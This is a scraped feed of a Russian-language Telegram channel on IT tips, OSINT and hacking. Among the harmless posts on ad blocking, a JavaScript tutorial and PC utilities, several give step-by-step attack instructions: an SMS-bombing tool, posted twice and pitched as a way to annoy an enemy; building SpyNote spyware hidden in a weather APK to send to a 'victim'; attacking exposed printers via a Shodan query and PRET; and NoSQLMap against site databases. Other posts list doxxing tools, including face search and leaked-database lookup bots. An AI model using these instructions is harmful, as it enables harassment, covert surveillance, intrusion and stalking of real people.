CMD | IT
25.6K subscribers
2.4K photos
596 videos
10 files
3.87K links
Новости IT, Безопасность в сети, Социальная инженерия.

Ссылка: @Portal_v_IT

Сотрудничество: @oleginc, @tatiana_inc

Купить рекламу: telega.in/c/cmd_it

РКН: clck.ru/3Jb78b
Download Telegram
​​Как делать скриншоты в режиме инкогнито в Chrome и Firefox?

В целях соблюдения безопасности браузер Chrome запрещает делать скриншоты, если браузер находится в режиме инкогнито.

Однако, это ограничение возможно обойти:
1. Перейдите по адресу "chrome://flags".
2. Введите в поиске "Incognito screenshot".
3. Активируйте флаг.
4. Перезапустите браузер.

В отличии от Chrome, в Firefox этот параметр находится в стандартном меню настроек.

Перейдите в "Настройки -> Приватный просмотр". Включите "Разрешить скриншоты в приватном просмотре".
👍2
​​Как пробить человека по фото?

search4faces.com — сайт, который может найти человека по фото в Tiktok, Одноклассники, ВКонтакте и Clubhouse.

1. Перейдите на сайт и загрузите фотографию человека.
2. Укажите предполагаемые данные: возраст, страну, город и пол. Или оставьте как есть.
3. Нажмите "Найти".

Если будут найдены совпадения, то вы увидите имя и фамилию пользователя. Ниже будет указан процент совпадения, город и возраст.

В разделах "Похожие" и "Остальные" появятся профили, которые менее чем на 55% совпадают с фотографией, которую вы загрузили.
​​Как устроить мощную спам-атаку на телефон?

В данном посте будет рассмотрен способ организации мощной SMS-атаки на любой номер телефона.

Подобную атаку можно спокойно использовать чтобы насолить своему неприятелю и вывести его из себя.

Приступим:

1. Обновляем нужные пакеты:
- apt update & apt upgrade -y

2. Устанавливаем пакет "Git"
- pkg install git

3. Устанавливаем репозиторий Github:
- git clone https://github.com/Argisht44/android.git

4. Далее просто прописывайте команды по очереди:
- cd android
- cd Infinite-Bomber-arm64
- chmod 777 infinite-bomber


5. Запустите утилиту:
- ./infinite-bomber

Сразу после запуска, вам предложит ввести и номер, как только вы введёте, атака начнётся.
👍1
​​Как создать вирус и засунуть его в APK?

Созданный вирус позволит вам получить практически полный доступ к устройству жертвы: Отправка СМС/ММС, активировать камеру, просмотр сохранённых паролей, микрофон и так далее.

1. Скачиваем и устанавливаем следующие программы: Java, JDK8 и SpyNote.

2. Заходим в SpyNote, вписываем рандомный порт и нажимаем "OK".

3. Ищем в Tools пункт Payload, задаём нашему .apk иконку, название и версию.

4. Переходим во вкладку DNS Info, тут мы будем вписывать адрес для коннекта, для этого создаём ngrok или открываем порты на VPN (в интернете много информации об этом).

5. Теперь идём во вкладку Properties и выбираем права для нашего вируса (ставим везде галочки, т.к нам нужны все функции).

6. Далее во вкладке Merging App указываем .apk файл для склейки. В папку со SpyNote я закинул апк погоды, вы можете выбрать своё приложение.

7. Нажимаем "Build" и скидываем готовое приложение жертве.

Готово!
​​Взлом пароля WinRAR

В данном посте пойдёт речь про неотъемлимую часть жизни - Запароленный Архив, который нужно срочно открыть. Но как? Легко!

Хочу уточнить, что данный метод подойдёт только для Архива, который был запакован максимум в 4 версии RAR'a. Из-за нововведения в 5 версии, фича работать не будет, т.к теперь стоит шифрование AES-256.

Инструкция:

1. Скачиваем программу Advanced Archive Password Recoverу
2. Устанавливаем ее > Открываем > переходим на вкладочку «Options» и устанавливаем русский язык.
3. Переходим на вкладку Длина и устанавливаем количество символов.
(по опыту скажу, лучше пробовать с 4 символов)
4. Далее выбираем тип атаки > выбираем набор символов.
5. Открываем в программе архив, к которому нужно подобрать пароль и ждем.

Готово! Пароль от архива взломан.
​​​​​Проверяем сайт на наличие вирусов

Полагаю, при поиске нужных файлов, документов или фильмов, многие сталкивались с ситуацией, когда, казалось бы, нужный материал обнаружен, но вот сайт не вызывает доверия: домен странный, название - хаотичный набор букв, а описание и вовсе состоит из непонятных иероглифов.

При переходе на подобный сомнительный сайт, пользователь рискует заразиться, особенно при отсутствии надежной антивирусной защиты. Так как же быть?

Safeweb — сервис, который проверит сайт на наличие вирусов. Для этого введите адрес веб-сайта, который хотите проверить и через несколько секунд вы получите отчет о находящихся на нем угрозах, если они имеются. Помимо этого, вы можете почитать отзывы о безопасности интересующего вас сайта и посмотреть его рейтинг.
​​Симуляция Linux в браузере

Энтузиасты использовали HTML, CSS и JavaScript. Итоговый результат выглядит очень натуралистично, хоть и не без недостатков. На GitHub появился проект, в котором Linux попытались симулировать при помощи JavaScript и CSS. Получилось очень правдоподобно, но не без упущений.

Называется симуляция операционной системы в браузере — "linuxWeb". Доступна она в одноимённом GitHub-репозитории пользователя под ником Manthee1. При этом, в отличие от многих своих коллег, разработчик не стал расписывать в readme-файле процесс создания проекта.

При попадании на сервис, сначала вы увидите просьбу нажать любую клавишу, после чего начнётся процесс загрузки «операционной системы». Затем вам предложат ввести пароль (123). Попав на рабочий стол системы, пользователи того же Ubuntu почувствуют себя как дома.
​​Как взломать принтер с помощью Termux

Вы когда-нибудь задумывались, зачем хакеры проводят атаки на принтеры? Дело в том, что принтеры могут раскрыть гораздо больше информации, чем кажется. Целью атаки может быть память NVRAM устройства, в котором могут находиться данные для входа (пароль).

Кроме того, таким образом можно получить доступ к файловой системе, в которой находятся файлы конфигурации и данные аутентификации аккаунтов. Это лишь основные причины взлома таких информационных носителей, но на самом деле их гораздо больше.

Установка:

▫️git clone https://github.com/RUB-NDS/PRET
▫️cd PRET

▫️pip install colorama pysnmP

Использование:

Теперь переходим на сайт Shodan и в строке поиска вводим запрос:
▫️port:9100 pjl

Выбираем нужный нам IP принтера, переходим обратно в терминал и прописываем:
▫️python2 pret.py (ip адрес жертвы) pjl
​​Как ломать БД на сайтах?

В данном посте пойдёт речь про утилиту NoSQLMap. Это достаточно простой инструмент, написанный на языке программирования Python, имеющий полностью открытый код и любой желающий может взглянуть на него изнутри.

Для корректной работы программы необходим предустановленный Metasploit.

Установка:

▫️git clone https://github.com/codingo/NoSQLMap.git
▫️cd NoSQLMap
▫️python setup.py install

Использование:

▫️python nosqlmap.py

Далее всё предельно просто.
​​Проводим поиск человека по его Никнейму

В данном посте хочу в очередной раз затронуть тему поиска человека в интернете. На этот раз поиск по никнейму.

Spokeo - проводит поиск по имени, нику, телефонному номеру и адресу.

Namecheckup - проверяет занятость никнейма на сайтах, в приложениях и доменах.

Social-searcher - поможет найти практически все упоминания слов или никнейма в социальных сетях и на различных новостных сайтах.

Thatsthem - проводит полный поиск людей по имени, адресу, номеру телефона, адресу электронной почты, IP-адресу или VIN.

Leakedsource - Дает пользователю возможность осуществлять поиск по нику, номеру, паролю, IP адресу и электронной почте.

Usersearch - помогает сузить поиск до определенных категорий. Например, только до крипто форумам, сайтам знакомств или различных социальных сетей.
​​Как пробить страницу в ВК?

В данном посте собраны самые лучшие для работы с этой соц.сетью, которыми пользуются профессионалы в сфере OSINT-Разведки.

1. Узнать ID страницы — этот уникальный идентификатор пригодится вам в дальнейшем.

2. InfoApp — генерирует ссылки на новостную ленту цели, ее упоминания, собирает комментарии от лица цели, сортирует записи со стены по типам.

3. Тут Найдут — архив страниц ВК, может найтись реальная фамилия, дата рождения, информация об уже удаленной странице.

4. Поиск друзей закрытого аккаунта — после перехода по ссылке нужно будет заменить XXX на ID искомой страницы.

5. 220vk.com — Огромный комбайн для работы с ВК, от поиска закрытых друзей до мониторинга активности.
👍2
Как отключить всю рекламу на смартфоне

Нынешний интернет-серфинг сложно представить без назойливой рекламы, ведь ее присутствие встречается буквально всюду. И что самое неприятное, помимо причинения эстетического дискомфорта, она безжалостно истощает ресурсы системы и драгоценного интернет трафика.

Положительная новость заключается в том, что блокировать большую часть рекламы можно и без установки дополнительных приложений. Для этого нужно перейти в настройки устройства, найти пункт «Частный DNS» и вписать туда dns.AdGuard.com.

После чего включится фильтрация трафика, которая будет блокировать нежелательный контент и вспомогательно защищать личные данные. Стоит отметить, что данный способ работает только на Android-устройствах, чья версия операционной системы не ниже 9-й. Инструкции для других устройств можно найти здесь.

#полезно
1👍1
​​Устраиваем мощнейшую СМС-Атаку

В данном посте будет рассмотрен способ организации мощной SMS-атаки на любой номер телефона. Подобную атаку можно спокойно использовать чтобы насолить своему неприятелю и вывести его из себя.

Приступим:

1. Обновляем нужные пакеты:
- apt update & apt upgrade -y

2. Устанавливаем пакет "Git"
- pkg install git

3. Устанавливаем репозиторий Github:
- git clone https://github.com/Argisht44/android.git

4. Далее просто прописывайте команды по очереди:
- cd android
- cd Infinite-Bomber-arm64
- chmod 777 infinite-bomber

5. Запустите утилиту:
- ./infinite-bomber

Сразу после запуска, вам предложит ввести и номер, как только вы введёте, атака начнётся.
​​Боты для пробива в Telegram

В данном посте пойдёт речь про ботов в Telegram, позволяющих провести пробив и узнать практически всю нужную информацию про вашу жертву.

Боты не гарантируют вам полной информации, но в OSINT может пригодится каждый байт данных.

1. @bmi_np_bot - позволяет определить страну, регион и оператора имея всего-лишь номер телефона.

2. @getfb_bot - выдаёт по номеру телефона страницу в Facebook.

3. @get_kontakt_bot - показывает, как номер указан в контактах.

4. @GetPhone_bot - пробивает номер телефона по открытым базам данных.

5. @imole_bot - пробивает по слитымы базам данных номер телефона.
1
​​Сервисы для пробива по фото

В данном посте пойдёт речь про специализированные сервисы для пробива по фото. Подборка достаточно большая, в ней собраны практически всевозможные сайты для проведения и упрощения OSINT разведки.

Фото:
1. azure.microsoft.com — соотнесение лиц, определит вероятность того, что на двух разных изображениях изображен один и тот же человек, и выдаст оценку достоверности

2. findclone.ru — поиск по базе из VK

3. pimeyes.com — индексирует фото с сайтов, не точен, ограниченные возможности

4. search4faces.com — поиск по базам лиц VK и OK

5. metapicz.com — покажет EXIF
stolencamerafinder.com — определит EXIF и по этим данным найдет какие еще фото были сделаны этим устройством

6. exif.regex.info — извлекает META-данные

7. cameratrace.com — определит EXIF и по этим данным найдет какие еще фото были сделаны этим устройством

8. get-metadata.com — извлекает META-данные

9. 29a.ch — фото-форензика, анализ изображения на изменения

10. stylesuxx.github.io — декодирует скрытое сообщение в изображении

Для файла формата PDF:

1. exif.regex.info — извлекает META-данные
2. www.get-metadata.com — извлекает META-данные
👍2
​​Компьютерная разведка

В данном посте поговорим о сервисах и ути­литах, которые созданы для ана­лиза таких дан­ных, как IP, SSID, метадан­ные фай­лов, DNS-записи, и все­го, где объ­ектом ана­лиза выс­тупа­ет эле­мент IT-струк­туры, будь то сайт или IP-адрес.

1. Urlscan.io — про­веря­ет, кому выдан TLS-сер­тификат и какие IP-адре­са свя­заны с сай­том.

2. PDFCandy — сервис дает тебе воз­можность извле­кать и изме­нять метадан­ные PDF.

3. PublicWWW — сервис ищет инфу по исходно­му коду стра­ниц. Находит ник­ней­мы, упо­мина­ния в коде, сопос­тавля­ет знач­ки сай­тов, что поз­воля­ет искать двой­ники.

4. Metadata2Go — поможет узнать все метадан­ные фай­ла.

5. Knock Subdomain Scan— переби­рает суб­домены на целевом домене и может генери­ровать выход­ной файл сhttps://github.com/guelfoweb/knock резуль­татами.
​​Воскресная подборка: программы которые прокачают ваш ПК

В данной воскресной подборке пойдёт речь про специализированные программы способные "прокачать" ваш ПК, а именно добавить какие-то новые функции, ускорить работу и так далее.

Unchecky - автоматически снимает галочки напротив разрешений на установку дополнительных и скрытых сервисов при установке программ.

TeraCopy - заменяет стандартное окно копирования файлов, предоставляя куда больше информации об этом процессе добавляя к нему дополнительный функционал.

Moo0 System Monitor - маленький и легкий виджет для рабочего стола, который показывает абсолютно всю информацию о происходящих процессах и состоянии компьютера в режиме реального времени.

Fences - позволяет быстро и удобно сортировать и группировать файлы, папки и ярлыки рабочего стола в аккуратные таблички, которые можно гибко настраивать.

Light Bulb - автоматически меняет яркость и оттенок экрана в зависимости от времени суток.
Вам нравится наша новая рубрика "Воскресная подборка"?
Anonymous Poll
89%
Топ бро! 💪🏻
11%
Нет, не очень! ✖️
Современный учебник JavaScript

learn.javascript.ru — учебник по JavaScript, начиная с основ, включающий в себя много тонкостей и фишек JavaScript/DOM. Вы можете изучить JavaScript, начиная с нуля и заканчивая продвинутыми концепциями вроде ООП.
​​Декодируем любые шифры с помощью hURL

hURL — Небольшая утилита, которая может кодировать и декодировать между огромным количеством различных шифров.

Установка:
$ git clone https://github.com/fnord0/hURL
$ cd hURL

Использование:
$ ./hURL -b "S2FsaSBMaW51eAo="

Вывод:
Original string :: S2FsaSBMaW51eAo=
base64 DEcoded string :: Kali Linux


Вся информация предоставлена исключительно с целью ознакомления. Мы не несём ответственности за ваши действия.
👍1
​​Проверка граждан РФ

В данном посте представленна подборка из очень полезных сайтов, которые подскажут вам очень много интересной информации про интересующего вас человека.

1.Международный розыск: https://www.interpol.int/notice/search/wanted

2. Список террористов: http://fedsfm.ru/documents/terrorists-catalog-portal-act

3. Федеральный розыск:
https://mvd.ru/wanted

4. Розыск сбежавших заключенных:
http://fsin.su/criminal/

5. Розыск ФССП:
http://fssprus.ru/iss/ip_search\

6. Действительность паспорта:
http://сервисы.гувм.мвд.рф/info-service.htm?sid=2000

7. Проверка ИНН:
https://service.nalog.ru/inn.do

8. Кредиты:
https://app.exbico.ru/

9. Исполнительные производства:
http://fssprus.ru/iss/ip

10. Налоговые задолженности:
https://peney.net/

11. Залоги имущества:
https://www.reestr-zalogov.ru/state/index#

12. Банкротство:
https://bankrot.fedresurs.ru/

13. Участие в судопроизводстве: https://bsr.sudrf.ru/bigs/portal.html

14. Решения мировых судей СПб:
https://mirsud.spb.ru/

15. Участие в бизнесе:
https://zachestnyibiznes.ru/
https://ogrn.site/